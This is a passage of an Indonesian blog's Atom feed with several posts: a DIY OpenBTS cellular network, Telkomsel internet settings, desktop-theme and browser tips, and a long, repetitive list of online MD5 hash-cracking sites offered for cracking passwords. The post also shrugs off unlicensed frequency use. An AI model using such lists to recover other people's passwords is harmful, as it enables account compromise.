adalah,&lt;/div&gt;&lt;ul style="line-height: 1.5em; list-style-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/bullet.gif); list-style-type: square; margin-bottom: 0px; margin-left: 1.5em; margin-right: 0px; margin-top: 0.3em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="margin-bottom: 0.1em;"&gt;&lt;b&gt;Apakah kita perlu ijin?&lt;/b&gt;&amp;nbsp;Jawabnya: Teorinya memang semua penggunaan frekuensi di Indonesia harus pakai ijin. Masalahnya yang bisa dapat ijin penggunaan frekuensi selular 900MHz hanya operator saja. Tidak mungkin sekolah, kantor apalagi perorangan untuk memperoleh ijin tersebut.&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;&lt;b&gt;Apakah kalau untuk penggunaan dalam kantor / rumah perlu ijin?&lt;/b&gt;&amp;nbsp;Jawab: Faktanya sekarang ini banyak relay&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/GSM" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="GSM"&gt;GSM&lt;/a&gt;&amp;nbsp;yang digunakan untuk di dalam Mall, perkantoran yang di jual bebas dan di gunakan tanpa ijin heheh ..&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;&lt;b&gt;Bagaimana kalau kita mengunakan ini untuk di daerah tertinggal / di kampung / di lokasi bencana alam?&lt;/b&gt;&amp;nbsp;Jawab: kita berdoa saja semoga pemerintah kita cukup legowo untuk tidak mensweeping kita yang sedang mencari solusi untuk orang yang di timpa musibah.&lt;/li&gt;&lt;/ul&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;a href="" name="Ke_Depan" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;"&gt;&lt;/a&gt;&lt;h2 style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(170, 170, 170); border-bottom-style: solid; border-bottom-width: 1px; color: black; font-size: 19px; font-weight: normal; margin-bottom: 0.6em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0.17em; padding-top: 0.5em;"&gt;&lt;span class="editsection" style="float: right; font-size: 13px; margin-left: 5px;"&gt;[&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php?title=Mudahnya_Membuat_Operator_Selular_Sendiri%21_Nelepon_pakai_GSM_gratis_aja_kalee_..&amp;amp;action=edit&amp;amp;section=5" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Edit section: Ke Depan"&gt;edit&lt;/a&gt;]&lt;/span&gt;&lt;span class="mw-headline"&gt;Ke Depan&lt;/span&gt;&lt;/h2&gt;&lt;div style="line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;Pada tingkat lebih lanjut, kita dapat mengembangkan lebih lanjut infrastruktur ini misalnya,&lt;/div&gt;&lt;ul style="line-height: 1.5em; list-style-image: url(http://opensource.telkomspeedy.com/wiki/skins/monobook/bullet.gif); list-style-type: square; margin-bottom: 0px; margin-left: 1.5em; margin-right: 0px; margin-top: 0.3em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Interkoneksi melalui&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Internet" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Internet"&gt;Internet&lt;/a&gt;&amp;nbsp;ke operator telekomunikasi Indonesia, seperti, XL, Axis, esia, BakrieTel dll karena mereka semua menggunakan protokol yang sama dengan asterisk yang digunakan oleh&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/OpenBTS" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="OpenBTS"&gt;OpenBTS&lt;/a&gt;&amp;nbsp;yaitu&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Session_Initiation_Protocol" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="Session Initiation Protocol"&gt;Session Initiation Protocol&lt;/a&gt;&amp;nbsp;(&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/SIP" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="SIP"&gt;SIP&lt;/a&gt;).&lt;/li&gt;&lt;li style="margin-bottom: 0.1em;"&gt;Membuat&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/ENUM" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: #002bb8; text-decoration: none;" title="ENUM"&gt;ENUM&lt;/a&gt;&amp;nbsp;Server sendiri agar dapat mengenali penomoran +62.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;sumber :&amp;nbsp;&lt;a href="http://opensource.telkomspeedy.com/wiki/index.php/Mudahnya_Membuat_Operator_Selular_Sendiri!_Nelepon_pakai_GSM_gratis_aja_kalee_.."&gt;http://opensource.telkomspeedy.com/wiki/index.php/Mudahnya_Membuat_Operator_Selular_Sendiri!_Nelepon_pakai_GSM_gratis_aja_kalee_..&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-8391696844642692758?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/8391696844642692758/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=8391696844642692758&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/8391696844642692758'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/8391696844642692758'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2011/01/mudahnya-membuat-operator-selular.html' title='Mudahnya Membuat Operator Selular Sendiri'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-693202918177517020</id><published>2011-01-01T21:27:00.000+07:00</published><updated>2011-01-01T21:27:04.858+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Setting Internet Simpati/Hallo/AS GSM</title><content type='html'>1. Telkomsel Flash – Halo/Simpati/As (Waktu)&lt;br /&gt;Dial Up Number : *99***1#&lt;br /&gt;User Name :&lt;br /&gt;Password :&lt;br /&gt;Access Point : FLASH&lt;br /&gt;Extra Setting : at+cgdcont=1,”IP”,”flash”&lt;br /&gt;&lt;br /&gt;2. Telkomsel GPRS – Halo/Simpati/As (Data)&lt;br /&gt;Dial Up Number : *99***1#&lt;br /&gt;User Name : wap&lt;br /&gt;Password : wap123&lt;br /&gt;Access Point : TELKOMSEL&lt;br /&gt;Extra Setting : at+cgdcont=1,”IP”,”internet”&lt;br /&gt;&lt;br /&gt;ok lets try&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-693202918177517020?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/693202918177517020/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=693202918177517020&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/693202918177517020'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/693202918177517020'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2011/01/setting-internet-simpatihalloas-gsm.html' title='Setting Internet Simpati/Hallo/AS GSM'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-7690087387427550797</id><published>2010-12-29T14:05:00.000+07:00</published><updated>2010-12-29T14:06:43.919+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux blackbox'/><title type='text'>WIN 7 convert to Blackbox Linux</title><content type='html'>blackbox desktop its very wonderfull if you wanna be hacker.&lt;br /&gt;but, its easy if you just windows user. you can install &lt;a href="http://bb4win.sourceforge.net/bblean/"&gt;BBLEAN&lt;/a&gt; software and try it.&lt;br /&gt;you must download from : &lt;a href="http://bb4win.sourceforge.net/bblean/"&gt;http://bb4win.sourceforge.net/bblean/&lt;/a&gt; and NEXT - ..... and OK&lt;br /&gt;&lt;br /&gt;this ex:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_CuLCazNJ-uU/TRrdct7drII/AAAAAAAAABE/n2VxPaZnwlk/s1600/blackbox+bblean.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="http://3.bp.blogspot.com/_CuLCazNJ-uU/TRrdct7drII/AAAAAAAAABE/n2VxPaZnwlk/s320/blackbox+bblean.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;my desktop&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-7690087387427550797?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/7690087387427550797/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=7690087387427550797&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/7690087387427550797'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/7690087387427550797'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2010/12/win-7-convert-to-blackbox-linux.html' title='WIN 7 convert to Blackbox Linux'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_CuLCazNJ-uU/TRrdct7drII/AAAAAAAAABE/n2VxPaZnwlk/s72-c/blackbox+bblean.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-616010819769866126</id><published>2010-12-28T22:35:00.000+07:00</published><updated>2010-12-28T22:37:17.426+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Download Opera'/><title type='text'>Download Opera Browser</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://my.opera.com/community/download.pl?ref=yudhadewantoro&amp;amp;p=opera_desktop" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://promote.opera.com/myopera/opera.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Pingin Mengebut di Web... Pakai Opera Browser&lt;br /&gt;&lt;br /&gt;Pengalaman browsing tercepat yang tersedia bagi Komputer/Laptop/netbook/smartphone bahkan telepon Anda. Dengan kecepatan pengolahan dan pengendaliannya yang efisien, Opera memimpin jauh di depan browser ponsel lain.&lt;br /&gt;Browsing dengan mudah&lt;br /&gt;&lt;br /&gt;Jelajahi Web pada komputer ataupun ponsel terasa sangat mudah. Telepon apa pun yang Anda pakai, pengalaman pengguna yang mulus menanti Anda.&lt;br /&gt;&lt;br /&gt;Menghemat Biaya&lt;br /&gt;Hemat biaya paket data dengan memanfaatkan teknologi kompresi Opera untuk mengurangi biaya data hingga 90%.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-616010819769866126?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/616010819769866126/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=616010819769866126&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/616010819769866126'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/616010819769866126'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2010/12/download-opera-browser.html' title='Download Opera Browser'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-8408275861792374395</id><published>2010-12-28T10:25:00.000+07:00</published><updated>2010-12-28T15:37:56.242+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cracking'/><category scheme='http://www.blogger.com/atom/ns#' term='md5'/><title type='text'>MD5 CRACKING</title><content type='html'>This some website for decrypt MD5 password :&lt;br /&gt;&lt;br /&gt;You can try and crack many password on md5 format.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; http://www.milw0rm.com/cracker/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.plain-text.info/add/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.securitystats.com/tools/hashcrack.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.passcrack.spb.ru/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://gdataonline.com/seekhash.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5-brute.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5encryption.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.insidepro.com/hashes.php?lang=rus&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.cirt.net/cgi-bin/passwd.pl&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://passcracking.ru&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.hashchecker.com/?_sls=add_hash&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.tydal.nu/category/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.dustinfineout.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5-db.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5hashes.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://sha1search.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.xpzone.de/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.csthis.com/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.benramsey.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5this.com/crack-it-/index.php&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://hackerscity.free.fr/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://ice.breaker.free.fr/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5search.deerme.org/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5decrypter.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://securitydb.org/cracker/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://plain-text.info/index/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.tmto.org/?category=main&amp;amp;page=home&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.geeks.li/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://hashreverse.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.overclock.ch/biz/index.php?p=md5crack&amp;amp;l=en&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5crack.it-helpnet.de/index.php?op=add&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;https://astalavista.net/index.php?&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5search.uk.to/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://74.52.200.226/~b4ck/passhash/index.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.tmto.org/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.rednoize.com&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://nz.md5.crysm.net&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://us.md5.crysm.net&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.xmd5.org&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://gdataonline.com&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.hashchecker.com&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://passcracking.ru&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.milw0rm.com/md5&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://plain-text.info&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.securitystats.com/tools/hashcrack.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.schwett.com/md5/ – Does Norwegian words too&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://passcrack.spb.ru/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://shm.pl/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.und0it.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.neeao.com/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.benramsey.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5decrypt.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.khrone.pl/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.csthis.com/md5/index.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5decrypter.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5encryption.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5database.net/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.xpzone.de/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.geeks.li/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.hashreverse.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.cmd5.com/english.aspx&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5.altervista.org/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.overclock.ch/biz/index.php?p=md5crack&amp;amp;l=en&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5crack.it-helpnet.de/index.php?op=add&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://cijfer.hua.fi/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://shm.hard-core.pl/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.mmkey.com/md5/HOME.ASP&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.thepanicroom.org/index.php?view=cracker&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://rainbowtables.net/services/results.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://rainbowcrack.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.securitydb.org/cracker/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://passwordsecuritycenter.com/in…roducts_ id=7&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://0ptix.co.nr/md5&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;https://www.astalavista.net/?cmd=rainbowtables&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://ice.breaker.free.fr/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5this.com&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.pldsecurity.de/forum/md5.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.xeons.net/genesis/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://hackerscity.free.fr/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://bisix.cogia.net/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.allfact.info/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://bokehman.com/cracker/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.tydal.nu/article/md5-crack/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://ivdb.org/search/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.netsons.org/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.c.la/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.jock-security.com/md5_database/?page=crack&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://c4p-sl0ck.dyndns.org/cracker.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.blackfiresecurity.com/tools/md5lib.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5-db.com/index.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://passcrack.spb.ru/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.hashreverse.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://rainbowcrack.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5encryption.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.shalookup.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.rednoize.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://c4p-sl0ck.dyndns.org/cracker.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.tmto.org/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://linardy.com/md5.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.gdataonline.com/seekhash.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;https://www.w4ck1ng.com/cracker/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.hashchecker.com/index.php?_sls=search_hash&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.rainbowcrack-online.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://schwett.com/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5.org.cn/index_en.htm&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.xmd5.org/index_en.htm&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://nz.md5.crysm.net/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://us.md5.crysm.net/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://gdataonline.com/seekhash.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://passcracking.ru/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://shm.pl/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.neeao.com/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.benramsey.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5decrypt.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.khrone.pl/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.csthis.com/md5/index.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5decrypter.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5encryption.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5database.net/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.xpzone.de/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.hashreverse.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://alimamed.pp.ru/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5crack.it-helpnet.de/index.php?op=add&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://shm.hard-core.pl/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://rainbowcrack.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://passwordsecuritycenter.com/index.ph…p;products_id=7&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;https://www.astalavista.net/?cmd=rainbowtables&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://ice.breaker.free.fr/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5this.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://hackerscity.free.fr/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.allfact.info/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://bokehman.com/cracker/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.tydal.nu/article/md5-crack/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://passcracking.com/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://ivdb.org/search/md5/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.netsons.org/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.c.la/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://www.md5-db.com/index.php&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5.idiobase.de/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://md5search.deerme.org/&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;http://sha1search.com/&lt;br /&gt;&lt;br /&gt;notis : antihackerlink.co.id dan www.google.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-8408275861792374395?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 